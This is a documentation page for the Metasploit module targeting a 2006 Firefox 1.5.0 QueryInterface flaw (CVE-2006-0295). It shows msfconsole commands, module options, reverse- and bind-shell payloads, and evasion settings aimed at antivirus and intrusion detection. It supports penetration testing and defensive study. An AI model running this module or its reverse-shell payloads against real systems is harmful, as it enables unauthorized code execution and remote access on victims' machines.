Firefox location.QueryInterface() Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/browser/firefox_queryinterface metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Firefox location.QueryInterface() Code Execution
Module: exploit/multi/browser/firefox_queryinterface
Source code: modules/exploits/multi/browser/firefox_queryinterface.rb
Disclosure date: 2006-02-02
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Linux, OSX
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2006-0295

This module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. This module has been tested on OS X 10.3 with the stock Firefox 1.5.0 package.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use exploit/multi/browser/firefox_queryinterface
msf exploit(firefox_queryinterface) > exploit

Go back to menu.

Msfconsole Usage


Here is how the multi/browser/firefox_queryinterface exploit module looks in the msfconsole:

msf6 > use exploit/multi/browser/firefox_queryinterface

[*] No payload configured, defaulting to osx/ppc/shell/reverse_tcp
msf6 exploit(multi/browser/firefox_queryinterface) > show info

       Name: Firefox location.QueryInterface() Code Execution
     Module: exploit/multi/browser/firefox_queryinterface
   Platform: OSX, Linux
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2006-02-02

Provided by:
  hdm <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Firefox 1.5.0.0 Mac OS X
  1   Firefox 1.5.0.0 Linux

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:
  Space: 1288
  Avoid: 1 characters

Description:
  This module exploits a code execution vulnerability in the Mozilla 
  Firefox browser. To reliably exploit this vulnerability, we need to 
  fill almost a gigabyte of memory with our nop sled and payload. This 
  module has been tested on OS X 10.3 with the stock Firefox 1.5.0 
  package.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2006-0295
  OSVDB (22893)
  http://www.securityfocus.com/bid/16476
  http://www.mozilla.org/security/announce/mfsa2006-04.html

Module Options


This is a complete list of options available in the multi/browser/firefox_queryinterface exploit:

msf6 exploit(multi/browser/firefox_queryinterface) > show options

Module options (exploit/multi/browser/firefox_queryinterface):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (osx/ppc/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Firefox 1.5.0.0 Mac OS X

Advanced Options


Here is a complete list of advanced options supported by the multi/browser/firefox_queryinterface exploit:

msf6 exploit(multi/browser/firefox_queryinterface) > show advanced

Module advanced options (exploit/multi/browser/firefox_queryinterface):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module

Payload advanced options (osx/ppc/shell/reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   EnableStageEncoding         false            no        Encode the second stage payload
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   PayloadUUIDName                              no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                               no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                              no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking         false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries             0                yes       How many additional successful pingbacks
   PingbackSleep               30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StageEncoder                                 no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                    no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback       true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/browser/firefox_queryinterface module can exploit:

msf6 exploit(multi/browser/firefox_queryinterface) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Firefox 1.5.0.0 Mac OS X
   1   Firefox 1.5.0.0 Linux

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/browser/firefox_queryinterface exploit:

msf6 exploit(multi/browser/firefox_queryinterface) > show payloads

Compatible Payloads
===================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  payload/generic/custom                              normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                      normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                   normal  No     Generic Command Shell, Reverse TCP Inline
   3  payload/osx/ppc/shell/bind_tcp                      normal  No     OS X Command Shell, Bind TCP Stager
   4  payload/osx/ppc/shell/reverse_tcp                   normal  No     OS X Command Shell, Reverse TCP Stager
   5  payload/osx/ppc/shell_bind_tcp                      normal  No     OS X Command Shell, Bind TCP Inline
   6  payload/osx/ppc/shell_reverse_tcp                   normal  No     OS X Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the multi/browser/firefox_queryinterface exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/browser/firefox_queryinterface) > show evasion

Module evasion options:

   Name                      Current Setting  Required  Description
   ----                      ---------------  --------  -----------
   HTML::base64              none             no        Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
   HTML::javascript::escape  0                no        Enable HTML obfuscation via HTML escaping (number of iterations)
   HTML::unicode             none             no        Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
   HTTP::chunked             false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression         none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding      false            no        Enable folding of HTTP headers
   HTTP::junk_headers        false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache            false            no        Disallow the browser to cache HTTP content
   HTTP::server_name         Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size        0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay           0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • hdm

Version


This page has been produced using Metasploit Framework version 6.1.33-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.